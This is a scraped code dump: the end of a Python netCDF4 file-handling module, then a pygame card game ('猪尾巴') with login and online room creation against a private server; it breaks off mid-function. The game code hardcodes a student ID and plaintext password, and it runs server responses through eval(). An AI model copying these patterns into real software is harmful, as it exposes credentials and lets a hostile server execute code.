Aborting!!!\"\n )\n raise NetCDF4InterfaceError(msg=msg)\n\n # Collect the netCDF variable; proceed accordingly.\n if level is None:\n if from_ncgroup:\n ncvar = parser_interface.dict_key_value(\n dict_in=ncgroups.variables, key=ncvarname, no_split=True\n )[...]\n if not from_ncgroup:\n ncvar = parser_interface.dict_key_value(\n dict_in=ncfile.variables, key=ncvarname, no_split=True\n )[...]\n if level is not None:\n if from_ncgroup:\n ncvar = parser_interface.dict_key_value(\n dict_in=ncgroups.variables, key=ncvarname, no_split=True\n )[:, level, :, :]\n if not from_ncgroup:\n ncvar = parser_interface.dict_key_value(\n dict_in=ncfile.variables, key=ncvarname, no_split=True\n )[:, level, :, :]\n\n # Close the open netCDF-formatted file.\n ncfile.close()\n\n # If specified, truncate the respective netCDF dimension.\n if squeeze:\n try:\n ncvar = numpy.squeeze(ncvar, axis=axis)\n except ValueError:\n ncvar = ncvar[0, ...]\n\n return ncvar\n\n\n# ----\n\n\ndef ncvarexist(ncfile: str, ncvarname: str, ncfrmt: str = None) -> bool:\n \"\"\"\n Description\n -----------\n\n This function reads a netCDF-formatted file and queries the\n variable list for the existence of a specified variable name\n (`ncvarname`); it returns a boolean values indicating whether the\n variable name has been found.\n\n Parameters\n ----------\n\n ncfile: ``str``\n\n A Python string specifying the netCDF-formatted file to be\n read.\n\n ncvarname: ``str``\n\n A Python string specifying the netCDF variable to be queried.\n\n Keywords\n --------\n\n ncfrmt: ``str``, optional\n\n A Python string specifying the format of the netCDF-formatted\n file (to be created); available options are NETCDF4,\n NETCDF4_CLASSIC, NETCDF3_CLASSIC, NETCDF3_64BIT_OFFSET, or\n NETCDF3_64BIT_DATA; if not specified, NETCDF4_CLASSIC is\n assumed.\n\n Returns\n -------\n\n ncvarexist: ``bool``\n\n A Python boolean variable indicating whether the queried\n variable exists within the respective netCDF file.\n\n \"\"\"\n\n # Open the netCDF-formatted file.\n if ncfrmt is None:\n ncfrmt = \"NETCDF4_CLASSIC\"\n ncfile = netCDF4.Dataset(filename=ncfile, mode=\"r\", format=ncfrmt)\n\n # Check that the specified netCDF variable exists and proceed\n # accordingly.\n ncvarexist = False\n for name, _ in ncfile.variables.items():\n if ncvarname == name:\n ncvarexist = True\n break\n\n # Close the open netCDF-formatted file.\n ncfile.close()\n\n return ncvarexist\n\n\n# ----\n\n\ndef ncvarlist(ncfile: str, ncfrmt: str = None) -> List:\n \"\"\"\n Description\n -----------\n\n This function reads and returns a list of variables within the\n netCDF-formatted file specified upon entry.\n\n Parameters\n ----------\n\n ncfile: ``str``\n\n A Python string specifying the netCDF-formatted file to be\n read.\n\n Keywords\n --------\n\n ncfrmt: ``str``, optional\n\n A Python string specifying the format of the netCDF-formatted\n file (to be created); available options are NETCDF4,\n NETCDF4_CLASSIC, NETCDF3_CLASSIC, NETCDF3_64BIT_OFFSET, or\n NETCDF3_64BIT_DATA; if not specified, NETCDF4_CLASSIC is\n assumed.\n\n Returns\n -------\n\n varlist: ``List``\n\n A Python list of variables within the netCDF-formatted file\n specified upon entry.\n\n \"\"\"\n\n # Open the netCDF-formatted file.\n if ncfrmt is None:\n ncfrmt = \"NETCDF4_CLASSIC\"\n ncfile = netCDF4.Dataset(filename=ncfile, mode=\"r\", format=ncfrmt)\n\n # Collect the list of variables within the netCDF-formatted file.\n varlist = []\n for name, _ in ncfile.variables.items():\n varlist.append(name)\n\n return 
varlist\n\n\n# ----\n\n\ndef ncwrite(\n ncfile: str,\n ncdim_obj: object,\n ncvar_obj: object,\n ncfrmt: str = None,\n glbattrs_dict: Dict = None,\n) -> None:\n \"\"\"\n Description\n -----------\n\n This function writes a netCDF-formatted file, containing the\n specified dimensions, variables, and (optional) attributes.\n\n Parameters\n ----------\n\n ncfile: ``str``\n\n A Python string specifying the netCDF-formatted file (to be\n created).\n\n ncdim_obj: ``object``\n\n A Python object containing the dimension variable attributes\n for the netCDF-formatted file (to be created).\n\n ncvar_obj: ``object``\n\n A Python object containing the variable attributes for the\n netCDF-formatted file (to be created).\n\n Keywords\n --------\n\n ncfrmt: ``str``, optional\n\n A Python string specifying the format of the netCDF-formatted\n file (to be created); available options are NETCDF4,\n NETCDF4_CLASSIC, NETCDF3_CLASSIC, NETCDF3_64BIT_OFFSET, or\n NETCDF3_64BIT_DATA; if not specified, NETCDF4_CLASSIC is\n assumed.\n\n glbattrs_dict: ``Dict``, optional\n\n A Python dictionary containing global attribute values; the\n dictionary keys are the global attribute names while the\n dictionary values are the corresponding key values.\n\n \"\"\"\n\n # Open the netCDF-formatted file.\n if ncfrmt is None:\n ncfrmt = \"NETCDF4_CLASSIC\"\n ncfile = netCDF4.Dataset(filename=ncfile, mode=\"w\", format=ncfrmt)\n\n # Define the netCDF attibutes and proceed accordingly.\n ncdim_dict = __read_ncdim_obj__(ncdim_obj=ncdim_obj)\n ncvar_dict = __read_ncvar_obj__(ncvar_obj=ncvar_obj)\n for key, value in ncdim_dict.items():\n ncfile.createDimension(key, value)\n\n # Build the netCDF-formatted file and write each variable.\n for key, value in ncvar_dict.items():\n try:\n var_dict = value\n if var_dict[\"type\"].lower() == \"char\":\n datatype = str\n else:\n datatype = parser_interface.object_getattr(\n object_in=numpy, key=var_dict[\"type\"]\n )\n var = ncfile.createVariable(\n varname=var_dict[\"varname\"],\n datatype=datatype,\n dimensions=var_dict[\"dims\"],\n )\n if \"attrs\" in var_dict.keys():\n attr_dict = parser_interface.dict_key_value(\n dict_in=var_dict, key=\"attrs\"\n )\n for attr in attr_dict.keys():\n value = parser_interface.dict_key_value(\n dict_in=attr_dict, key=attr, no_split=True\n )\n var = parser_interface.object_setattr(\n object_in=var, key=attr, value=value\n )\n vallist = numpy.reshape(list(map(datatype, var_dict[\"values\"])), var.shape)\n var[:] = numpy.array(vallist, dtype=datatype)\n except TypeError:\n pass\n\n # Check whether to append the file with global attributes; proceed\n # accordingly.\n if glbattrs_dict is not None:\n # Define the global attributes for the netCDF-formatted file.\n for glbattr in glbattrs_dict:\n value = parser_interface.dict_key_value(\n dict_in=glbattrs_dict, key=glbattr, no_split=True\n )\n ncfile = parser_interface.object_setattr(\n object_in=ncfile, key=glbattr, value=value\n )\n\n # Close the open netCDF-formatted file.\n ncfile.close()\n\n\n# ----\n\n\ndef ncwritevar(\n ncfile: str, ncvarname: str, ncvar: numpy.array, ncfrmt: str = None\n) -> None:\n \"\"\"\n Description\n -----------\n\n This function opens a netCDF-formatted file and writes the array\n (`ncvar`) values for the specified variable to the respective\n (open) netCDF-formatted file.\n\n Parameters\n ----------\n\n ncfile: ``str``\n\n A Python string specifying the netCDF-formatted file to be\n written to.\n\n ncvarname: ``str``\n\n A Python string specifying the netCDF variable to be\n 
written/updated.\n\n ncvar: ``numpy.array``\n\n A Python array containing the values for the specified netCDF\n variable.\n\n Keywords\n --------\n\n ncfrmt: ``str``, optional\n\n A Python string specifying the format of the netCDF-formatted\n file (to be created); available options are NETCDF4,\n NETCDF4_CLASSIC, NETCDF3_CLASSIC, NETCDF3_64BIT_OFFSET, or\n NETCDF3_64BIT_DATA; if not specified, NETCDF4_CLASSIC is\n assumed.\n\n \"\"\"\n\n # Open the netCDF-formatted file.\n if ncfrmt is None:\n ncfrmt = \"NETCDF4_CLASSIC\"\n ncfile = netCDF4.Dataset(filename=ncfile, mode=\"a\", format=ncfrmt)\n\n # Write the specified variable to the specified netCDF-formatted\n # file.\n for name, _ in ncfile.variables.items():\n if ncvarname == name:\n ncfile.variables[ncvarname][:] = ncvar\n\n # Close the open netCDF-formatted file so the update is flushed to disk.\n ncfile.close()\n","repo_name":"HenryWinterbottom-NOAA/ufs_pyutils","sub_path":"ioapps/netcdf4_interface.py","file_name":"netcdf4_interface.py","file_ext":"py","file_size_in_byte":40363,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21152243306","text":"# coding=gbk\n# 伍浪\n# 加油冲冲冲\nimport sys\nimport pygame\nimport random\nimport time\nimport pygame.locals\nimport pygame.freetype\nimport requests\nimport tkinter\nimport tkinter.messagebox#弹窗库\npygame.init()\nd = {'fangkuai01': pygame.image.load('pokes/fangkuai1.jpg'), #将扑克牌图片放入字典,方便调用显示\n 'fangkuai02': pygame.image.load('pokes/fangkuai2.jpg'),\n 'fangkuai03': pygame.image.load('pokes/fangkuai3.jpg'),\n 'fangkuai04': pygame.image.load('pokes/fangkuai4.jpg'),\n 'fangkuai05': pygame.image.load('pokes/fangkuai5.jpg'),\n 'fangkuai06': pygame.image.load('pokes/fangkuai6.jpg'),\n 'fangkuai07': pygame.image.load('pokes/fangkuai7.jpg'),\n 'fangkuai08': pygame.image.load('pokes/fangkuai8.jpg'),\n 'fangkuai09': pygame.image.load('pokes/fangkuai9.jpg'),\n 'fangkuai10': pygame.image.load('pokes/fangkuai10.jpg'),\n 'fangkuai11': pygame.image.load('pokes/fangkuai11.jpg'),\n 'fangkuai12': pygame.image.load('pokes/fangkuai12.jpg'),\n 'fangkuai13': pygame.image.load('pokes/fangkuai13.jpg'),\n 'heitao01': pygame.image.load('pokes/heitao1.jpg'),\n 'heitao02': pygame.image.load('pokes/heitao2.jpg'),\n 'heitao03': pygame.image.load('pokes/heitao3.jpg'),\n 'heitao04': pygame.image.load('pokes/heitao4.jpg'),\n 'heitao05': pygame.image.load('pokes/heitao5.jpg'),\n 'heitao06': pygame.image.load('pokes/heitao6.jpg'),\n 'heitao07': pygame.image.load('pokes/heitao7.jpg'),\n 'heitao08': pygame.image.load('pokes/heitao8.jpg'),\n 'heitao09': pygame.image.load('pokes/heitao9.jpg'),\n 'heitao10': pygame.image.load('pokes/heitao10.jpg'),\n 'heitao11': pygame.image.load('pokes/heitao11.jpg'),\n 'heitao12': pygame.image.load('pokes/heitao12.jpg'),\n 'heitao13': pygame.image.load('pokes/heitao13.jpg'),\n 'hongtao01': pygame.image.load('pokes/hongtao1.jpg'),\n 'hongtao02': pygame.image.load('pokes/hongtao2.jpg'),\n 'hongtao03': pygame.image.load('pokes/hongtao3.jpg'),\n 'hongtao04': pygame.image.load('pokes/hongtao4.jpg'),\n 'hongtao05': pygame.image.load('pokes/hongtao5.jpg'),\n 'hongtao06': pygame.image.load('pokes/hongtao6.jpg'),\n 'hongtao07': pygame.image.load('pokes/hongtao7.jpg'),\n 'hongtao08': pygame.image.load('pokes/hongtao8.jpg'),\n 'hongtao09': pygame.image.load('pokes/hongtao9.jpg'),\n 'hongtao10': pygame.image.load('pokes/hongtao10.jpg'),\n 'hongtao11': pygame.image.load('pokes/hongtao11.jpg'),\n 'hongtao12': pygame.image.load('pokes/hongtao12.jpg'),\n 'hongtao13': pygame.image.load('pokes/hongtao13.jpg'),\n 'meihua01': 
pygame.image.load('pokes/meihua1.jpg'),\n 'meihua02': pygame.image.load('pokes/meihua2.jpg'),\n 'meihua03': pygame.image.load('pokes/meihua3.jpg'),\n 'meihua04': pygame.image.load('pokes/meihua4.jpg'),\n 'meihua05': pygame.image.load('pokes/meihua5.jpg'),\n 'meihua06': pygame.image.load('pokes/meihua6.jpg'),\n 'meihua07': pygame.image.load('pokes/meihua7.jpg'),\n 'meihua08': pygame.image.load('pokes/meihua8.jpg'),\n 'meihua09': pygame.image.load('pokes/meihua9.jpg'),\n 'meihua10': pygame.image.load('pokes/meihua10.jpg'),\n 'meihua11': pygame.image.load('pokes/meihua11.jpg'),\n 'meihua12': pygame.image.load('pokes/meihua12.jpg'),\n 'meihua13': pygame.image.load('pokes/meihua13.jpg')}\nnewpai = ['fangkuai01','fangkuai02','fangkuai03','fangkuai04','fangkuai05','fangkuai06','fangkuai07','fangkuai08','fangkuai09',\n 'fangkuai10','fangkuai11','fangkuai12','fangkuai13','heitao01','heitao02','heitao03','heitao04','heitao05',\n 'heitao06','heitao07','heitao08','heitao09','heitao10','heitao11','heitao12','heitao13','hongtao01','hongtao02',\n 'hongtao03','hongtao04','hongtao05','hongtao06','hongtao07','hongtao08','hongtao09','hongtao10','hongtao11',\n 'hongtao12','hongtao13','meihua01','meihua02','meihua03','meihua04','meihua05','meihua06','meihua07','meihua08',\n 'meihua09','meihua10','meihua11','meihua12','meihua13']\n\nplayer1 = [] #初始化玩家一、玩家二(电脑)手牌,放置区、牌堆手牌\nplayer2 = []\nsetpoker = []\npai = newpai[:]\n\nturn = 1 #表示出牌方,1为玩家一,-1为玩家二或者电脑\ndef begin():\n pygame.init() # 初始化init()及设置\n size = width, height = 566, 565 # 与下面的图片的大小,如果不一致会导致图片显示不完全,或者产生缝隙\n black = 0, 0, 0\n screen = pygame.display.set_mode(size) # 窗口大小\n pygame.display.set_caption(\"用户登录\") # 窗口名字\n # icon=pygame.image.load(\"snake.jpg\")加载窗口图片\n # pygame.display.set_icon(icon)#设置窗口图片\n background = pygame.image.load(\"图片/backgroud.png\")\n RED = pygame.Color(\"red\")\n BLUE = pygame.Color(\"blue\")\n BLACK = pygame.Color(\"black\")\n GAINSBORO = pygame.Color(\"gainsboro\")\n WHITESMOKE = pygame.Color(\"whitesmoke\")\n MOCCASIN = pygame.Color(\"moccasin\")\n WHITE = pygame.Color(\"white\")\n # screen.fill(MOCCASIN)可以和下面的背景图二选一\n screen.blit(background, (0, 0))\n f1 = pygame.freetype.Font('C:\\Windows\\Fonts\\simkai.ttf', size=50) # 调出文字的字体\n f1.render_to(screen, [100, 150], \"用户名 :\", fgcolor=WHITE, bgcolor=None, size=30) # 强调文字\n f1.render_to(screen, [100, 210], \"密 码 :\", fgcolor=WHITE, bgcolor=None, size=30)\n pygame.draw.rect(screen, WHITESMOKE, (230, 150, 200, 35)) # 两个输入框的位置,但不是真正的输入框,只是显示效果,可以实现文字的显示\n pygame.draw.rect(screen, WHITESMOKE, (230, 210, 200, 35))\n a, b = [], [] # 创建两个空列表,用来分别存储用户名和密码\n while True:\n # 为了实现鼠标移到按钮处,改变颜色,需要不断重绘鼠标不在按钮处时的按钮\n dl = f1.render_to(screen, [100, 400], \"登记\", fgcolor=BLACK, bgcolor=WHITESMOKE, size=50)\n zc = f1.render_to(screen, [400, 400], \"登录\", fgcolor=BLACK, bgcolor=WHITESMOKE, size=50)\n # 事件检测\n Flag = False\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n exit()\n elif event.type == pygame.locals.MOUSEBUTTONDOWN:\n mouse_x, mouse_y = pygame.mouse.get_pos() # 鼠标的点击位置\n if 230 <= mouse_x <= 430 and 150 <= mouse_y <= 185: # 判断点击了哪一个输入框\n pygame.draw.rect(screen, WHITE, (230, 150, 200, 35))\n pygame.draw.rect(screen, WHITESMOKE, (230, 210, 200, 35))\n wz = True # 用于改变后文文字输入显示的位置\n elif 230 <= mouse_x <= 430 and 210 <= mouse_y <= 245:\n pygame.draw.rect(screen, WHITE, (230, 210, 200, 35))\n pygame.draw.rect(screen, WHITESMOKE, (230, 150, 200, 35))\n wz = False\n elif 400 < mouse_x < 400 + dl[2] and 400 < mouse_y < 400 + dl[3]:\n Flag = True\n 
print(\"登录成功!\") # 判断按钮点击的位置是否是在登录按钮的区域内\n elif event.type == pygame.KEYDOWN: # 检测按键是否是数字键,通过打印输3出判断按键的码\n if wz and len(a) < 13: # 限制输入的长度,利用WZ来更改输入内容的显示位置\n a.append(event.unicode)\n elif wz == False and len(b) < 13:\n b.append(event.unicode)\n str_a = \"\" # 将输入内容存储到列表\n for i in a:\n str_a += str(i) # 转化拼接为字符串\n str_b = \"\"\n for i in b:\n str_b += str(i)\n url = \"http://172.17.173.97:8080/api/user/login\"\n payload = {'student_id': str_a,\n 'password': str_b}\n files = [\n ]\n headers = {}\n response = requests.request(\"POST\", url, headers=headers, data=payload, files=files)\n s = eval(response.text)\n # 显示字符串\n f1.render_to(screen, [235, 159], str_a, fgcolor=BLACK, bgcolor=WHITE, size=30)\n f1.render_to(screen, [235, 219], str_b, fgcolor=BLACK, bgcolor=WHITE, size=30)\n x, y = pygame.mouse.get_pos() # 判断鼠标移动到那个位置了,更改文字的背景色,文字的���示区域是一个矩形\n if x > 100 and y > 400 and x < 100 + zc[2] and y < 400 + zc[3]:\n f1.render_to(screen, [100, 400], \"登记\", fgcolor=BLACK, bgcolor=GAINSBORO, size=50)\n elif x > 400 and y > 400 and x < 400 + dl[2] and y < 400 + dl[3]:\n f1.render_to(screen, [400, 400], \"登录\", fgcolor=BLACK, bgcolor=GAINSBORO, size=50)\n pygame.display.update()\n if Flag == True and s['message'] == 'Success':\n\n return s['data']['token']\n sys.exit()\nfrom tkinter import *\n\nclass MyDialog:\n def __init__(self, parent):\n\n top = self.top = Toplevel(parent)\n\n Label(top, text=\"请输入房间号\").pack()\n\n self.e = Entry(top)\n self.e.pack(padx=5)\n b = Button(top, text=\"OK\", command=self.ok)\n b.pack(pady=5)\n def ok(self):\n root = tkinter.Tk()\n root.withdraw()\n tkinter.messagebox.showinfo('提示', '加入房间成功!')\n self.top.destroy()\nclass choose():\n global token_\n global uuid_\n def __init__(self,token):\n pygame.init()\n pygame.display.set_caption('在线对战')\n screen = pygame.display.set_mode((1400, 750))\n background = pygame.image.load('图片/backgroud.png')\n screen.blit(background, (0, 0))\n botton1=pygame.image.load('按钮/按钮1.png')\n botton2=pygame.image.load('按钮/按钮2.png')\n botton3= pygame.image.load('按钮/按钮3.png')\n botton4 = pygame.image.load('按钮/按钮4.png')\n screen.blit(botton1,(450,400))\n screen.blit(botton2,(450,520))\n screen.blit(botton3, (800, 400))\n screen.blit(botton4, (800, 520))\n self.botton1_area=pygame.Rect(460, 411, 155,60)\n self.botton2_area = pygame.Rect(469,526,150,60)\n self.mouse_position=''\n self.token=token\n self.uudi=''\n def uuid1(self):\n return self.uudi\n def get_uuid(self,token):\n url = \"http://172.17.173.97:9000/api/game\"\n payload = {'student_id': '031902129',\n 'password': 'yuanyuan520'}\n files = [\n ]\n headers = {\n 'Authorization': token}\n\n response = requests.request(\"POST\", url, headers=headers, data=payload, files=files)\n s = eval(response.text)\n if s['msg'] == '操作成功':\n root = tkinter.Tk()\n root.withdraw()\n tkinter.messagebox.showinfo('提示', '你创建的房间号为:' + str(s['data']['uuid']))\n\n return s['data']['uuid']\n def join_uuid(self,token):\n url = \"http://172.17.173.97:9000/api/game/\"+str(self.uuid)\n payload = {'student_id': '031902129',\n 'password': 'yuanyuan520'}\n files = [\n ]\n headers = {\n 'Authorization':token\n }\n response = requests.request(\"POST\", url, headers=headers, data=payload, files=files)\n s = eval(response.text)\n if s['msg'] == '操作成功':\n root = Tk()\n Button(root, text=\"Hello!\").pack()\n root.update()\n\n d = MyDialog(root)\n\n root.wait_window(d.top)\n root.mainloop()\n pygame.display.update()\n\n def run_game(self):\n Flag=False\n while True:\n for event in pygame.event.get():\n if event.type == 
pygame.QUIT:\n sys.exit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n self.mouse_position = pygame.mouse.get_pos()\n print(event.pos)\n if self.botton1_area.collidepoint(self.mouse_position):\n self.uuid=self.get_uuid(self.token)\n print(self.uuid)\n\n if self.botton2_area.collidepoint(self.mouse_position):\n try:\n pygame.quit()\n self.join_uuid(self.token)\n except:\n root = tkinter.Tk()\n root.withdraw()\n tkinter.messagebox.showinfo('提示', '还未创建房间!' )\n\n\n\n pygame.display.flip()\nclass begingame: #模式选择,规则说明\n def __init__(self):\n pygame.init()\n self.rule = 0\n pygame.display.set_caption(\"猪尾巴\")\n self.screen = pygame.display.set_mode((1400, 750))\n self.begingame = pygame.image.load('图片/开始游戏.png')\n self.typeselect = pygame.image.load('图片/模式选择.png')\n self.rule1 = pygame.image.load('图片/规则1.png')\n self.rule2 = pygame.image.load('图片/规则2.png')\n self.beginarea = pygame.Rect(584, 640, 236, 72)\n self.pve = pygame.Rect(580, 400, 270, 90)\n self.pvp = pygame.Rect(580, 515, 270, 90)\n self.net = pygame.Rect(580, 630, 270, 90)\n self.rulearea = pygame.Rect(1230, 0, 170, 60)\n self.returnarea1 = pygame.Rect(0, 0, 175, 65)\n self.returnarea2 = pygame.Rect(1220, 0, 280, 70)\n self.changerulearea = pygame.Rect(1224, 682, 176, 68)\n self.s = 1\n\n def update(self):\n if self.s == 1:\n if self.rule == 1:\n self.screen.blit(self.rule1, (0, 0))\n elif self.rule == 2:\n self.screen.blit(self.rule2, (0, 0))\n else:\n self.screen.blit(self.begingame, (0, 0))\n else:\n self.screen.blit(self.typeselect, (0, 0))\n\n def mouse(self, xy):\n if self.s == 1:\n if self.rulearea.collidepoint(xy) and self.rule == 0:\n self.rule = 1\n elif self.changerulearea.collidepoint(xy) and self.rule == 1:\n self.rule = 2\n elif self.changerulearea.collidepoint(xy) and self.rule == 2:\n self.rule = 1\n elif self.returnarea1.collidepoint(xy) and self.rule != 0:\n self.rule = 0\n elif self.beginarea.collidepoint(xy) and self.rule == 0:\n self.s = 2\n self.update()\n elif self.s == 2:\n if self.pvp.collidepoint(xy): #双人模式\n self.ai = Cardgame()\n self.ai.run_game()\n if self.pve.collidepoint(xy): #人机模式\n self.ai=Cardgame()\n self.ai.pve()\n self.ai.run_game()\n if self.net.collidepoint(xy):\n a = choose(begin())\n a.run_game()\n\n ##############\n if self.returnarea2.collidepoint(xy):\n self.s = 1\n\n def runbegin(self):\n while True:\n self.update()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n self.mouse(event.pos)\n pygame.display.flip()\n\n\nclass Cardgame: #真正的游戏类\n def __init__(self):\n pygame.init()\n pygame.display.set_caption(\"猪尾巴\")\n self.screen = pygame.display.set_mode((1400, 750))\n self.background = pygame.image.load('图片/backgroud.png')\n self.screen.blit(self.background, (0, 0))\n self.cardpile = pygame.image.load('图片/牌堆.png') # 更改了牌堆和放置区的名称,方便后续更新画面\n self.cadempty = pygame.image.load('图片/空牌堆.png') # 空牌堆\n self.screen.blit(self.cardpile, (260, 255))\n self.cardset = pygame.image.load('图片/放置区.png')\n self.screen.blit(self.cardset, (950, 255))\n self.area = pygame.Rect(280, 316, 123, 151)\n self.fire1area = pygame.Rect(620, 476, 130, 64)\n self.fire2area = pygame.Rect(620, 210, 130, 64)\n self.again_area = pygame.Rect(470, 580, 180, 80)\n self.return_area = pygame.Rect(720, 580, 180, 80)\n self.player1auto = pygame.Rect(972, 542, 152, 55)\n self.player2auto = pygame.Rect(282, 175, 152, 55)\n self.firebotton = pygame.image.load('按钮/出牌.png')\n self.newcard = pygame.image.load('图片/放置区.png') # 放置区最外面一张牌\n self.bequick = 
pygame.image.load('按钮/快出牌.png')\n self.auto = pygame.image.load('按钮/托管.png')\n self.notauto =pygame.image.load('按钮/取消托管.png')\n self.win1 = pygame.image.load('图片/player1win.png')\n self.win2 = pygame.image.load('图片/player2win.png')\n self.draw = pygame.image.load('图片/平局.png')\n self.again_game = pygame.image.load('按钮/再来一局.png')\n self.return_game = pygame.image.load('按钮/返回主菜单.png')\n self.player2image =pygame.image.load('图片/头像机器人.png')\n self.player1image =pygame.image.load('图片/农民.png')\n self.player1name = pygame.image.load('按钮/玩家一.png')\n self.player2name = pygame.image.load('按钮/玩家二.png')\n self.autoname = pygame.image.load('按钮/阿尔发.png')\n self.font = pygame.font.Font(None, 40)\n self.text = self.font.render(f'cards:{len(pai)}', True, (0, 0, 0), (255, 255, 255))\n self.lnewcard = '' # 新的newcard\n self.ischupai = 0 # 判断是否出牌\n self.ifauoto=0\n self.chupai = -1 #第几张牌,-1表示没出牌\n self.istrusteeship1 = False #表示是否托管\n self.istrusteeship2 = False\n self.tuopai=1 #判断托管是否应该出牌,1为出,0为不出\n def pve(self): #人机模式 #人机模式的额外初始化,在模式选择时候调用\n self.istrusteeship2=True\n self.ifauoto=1 #代表人机模式\n\n def reset(self, lst): #摸牌操作\n random.shuffle(lst)\n self.newcard = lst[-1] # 记录放置区最上面的牌\n setpoker.append(lst.pop()) # 将牌堆弹出的牌放入放置区队列,同时记录这张牌\n global turn\n self.eatcard(setpoker)\n turn = -turn # 换玩家出牌\n\n def eatcard(self, lst): #判断吃牌\n global turn\n if len(lst) > 1:\n if lst[-1][0:2] == lst[-2][0:2]: # 判断牌名前三个字符一样即可\n if (turn == 1):\n player1.extend(lst)\n elif (turn == -1):\n player2.extend(lst)\n lst.clear()\n self.newcard=''\n self.lnewcard=''\n\n def update(self): # 更新屏幕\n global turn\n self.screen.blit(self.background, (0, 0))\n self.screen.blit(self.player1image,(10,600))\n self.screen.blit(self.player2image,(1250,10))\n self.screen.blit(self.cardset, (950, 255))\n self.screen.blit(self.player1name,(17,542))\n if self.istrusteeship1==1:\n self.screen.blit(self.notauto,(972,542))\n else:\n self.screen.blit(self.auto, (972, 542))\n if self.ifauoto==0:\n self.screen.blit(self.player1image, (1250, 10))\n self.screen.blit(self.player2name, (1257, 175))\n if self.istrusteeship2 == 1:\n self.screen.blit(self.notauto, (282, 175))\n else:\n self.screen.blit(self.auto, (282, 175))\n else:\n self.screen.blit(self.player2image, (1250, 10))\n self.screen.blit(self.autoname, (1257, 175))\n if len(pai) != 0:\n self.screen.blit(self.cardpile, (260, 255))\n else:\n self.screen.blit(self.cadempty, (260, 255))\n if self.chupai != -1 and turn == 1: # 开火\n self.screen.blit(self.firebotton, (620, 476))\n if self.chupai != -1 and turn == -1:\n self.screen.blit(self.firebotton, (620, 210))\n if len(setpoker) != 0:\n self.screen.blit(d[self.newcard], (980, 321)) #以上到这为基础显示\n\n self.text = self.font.render(f'cards:{len(pai)}', True, (0, 0, 0), (255, 255, 255)) #剩余牌数\n self.screen.blit(self.text, (120, 360))\n player1.sort() # 手牌排序\n player2.sort()\n l1 = (1400 - len(player1) * 20 - 85) / 2 #计算距离,用于手牌居中\n l2 = (1400 - len(player2) * 20 - 85) / 2\n if self.istrusteeship1==False:\n j=0 # 更新玩家1手牌区\n for i in player1: #非托管玩家一手牌显示\n if j == self.chupai and turn == 1:\n self.screen.blit(d[i], (j * 20 + l1, 560))\n else:\n self.screen.blit(d[i], (j * 20 + l1, 600))\n j = j + 1\n else:\n j = 0\n for i in player1: #托管时玩家一手牌显示\n self.screen.blit(d[i], (j * 20 + l1, 600))\n j = j + 1\n if self.istrusteeship2==False:\n j=0 # 更新玩家2手牌区\n for i in player2: #玩家二手牌显示\n if j == self.chupai and turn == -1:\n self.screen.blit(d[i], (j * 20+l2, 40))\n else:\n self.screen.blit(d[i], (j * 20+l2,0))\n j = j + 1\n else:\n j = 0\n for i in player2: 
#电脑或玩家二托管时手牌显示\n self.screen.blit(d[i], (j * 20+l2, 0))\n j = j + 1\n\n if turn == 1: #出牌提醒按键\n self.screen.blit(self.bequick, (282, 542))\n else:\n self.screen.blit(self.bequick, (972, 175))\n\n if len(pai) == 0: #胜利结算\n if (len(player1) < len(player2)):\n self.screen.blit(self.win1, (470, 190))\n elif (len(player1)>len(player2)):\n self.screen.blit(self.win2, (470, 190))\n else:\n self.screen.blit(self.draw,(470,190))\n self.screen.blit(self.again_game, (470, 580))\n self.screen.blit(self.return_game, (720, 580))\n\n def renew(self): #一局游戏结束后初始化各个牌组及参数\n global pai\n global setpoker\n global player1\n global player2\n self.chupai=-1\n pai = newpai[:]\n setpoker = []\n player1 = []\n player2 = []\n\n def mouse(self, xy): # 判断鼠标操作,为鼠标坐标\n turnchange = 0\n global turn\n x = xy[0]\n y = xy[1]\n if self.player1auto.collidepoint(xy): #玩家一托管与取消托管\n if self.istrusteeship1==False:\n self.istrusteeship1 = True\n else:\n self.istrusteeship1 =False\n self.update()\n elif self.player2auto.collidepoint(xy) and self.ifauoto==0: #双人时玩家二托管与取消托管\n if self.istrusteeship2==False:\n self.istrusteeship2 = True\n else:\n self.istrusteeship2 =False\n self.update()\n\n else:\n if self.area.collidepoint(xy) and len(pai) != 0: #抽牌\n self.reset(pai)\n self.eatcard(setpoker)\n self.chupai = -1 # 换人把出牌恢复\n if self.fire1area.collidepoint(xy) and self.chupai != -1 and turn == 1: #玩家一出牌\n if len(player1) != 0:\n setpoker.append(player1[self.chupai])\n self.newcard = player1.pop(self.chupai)\n self.chupai = -1\n self.eatcard(setpoker)\n turn=-turn\n if self.fire2area.collidepoint(xy) and self.chupai != -1 and turn == -1: #电脑或玩家二出牌\n if len(player2) != 0:\n setpoker.append(player2[self.chupai])\n self.newcard = player2.pop(self.chupai)\n self.chupai = -1\n self.eatcard(setpoker)\n turn=-turn\n l1 = (1400 - len(player1) * 20 - 85) / 2 #轮到玩家一时判断点的第几张牌,突出显示\n if x < len(player1) * 20 + 85 + l1 and 600 < y < 750 and turn == 1 and self.istrusteeship1 ==False:\n if x <= len(player1) * 20 + l1:\n self.ifchupai = int((x - l1) // 20)\n else:\n self.ifchupai = len(player1) - 1\n if self.ifchupai == self.chupai:\n self.chupai = -1\n else:\n self.chupai = self.ifchupai\n l2 = (1400 - len(player2) * 20 - 85) / 2 #轮到玩家二时判断点的第几张牌,突出显示\n if x < len(player2) * 20 + 85 + l2 and 0 < y < 150 and turn == -1 and self.istrusteeship2 == False:\n if x <= len(player2) * 20 + l2:\n self.ifchupai = int((x - l2) // 20)\n else:\n self.ifchupai = len(player2) - 1\n if self.ifchupai == self.chupai:\n self.chupai = -1\n else:\n self.chupai = self.ifchupai\n self.update()\n\n def tuoguan(self): #托管或机器\n self.tuopai=1\n if turn == 1:\n if len(player1)==0 and len(pai)!=0:\n self.reset(pai)\n self.chupai = -1\n self.update()\n time.sleep(0.3)\n else:\n self.trusteeship(player1)\n if self.tuopai==0:\n self.reset(pai)\n self.chupai = -1\n self.update()\n time.sleep(0.3)\n if self.tuopai==1:\n self.secondcard()\n self.update()\n time.sleep(0.3)\n else:\n if len(player2) == 0 and len(pai) != 0:\n self.reset(pai)\n self.chupai = -1\n self.update()\n time.sleep(0.3)\n else:\n self.trusteeship(player2)\n if self.tuopai == 0:\n self.reset(pai)\n self.chupai 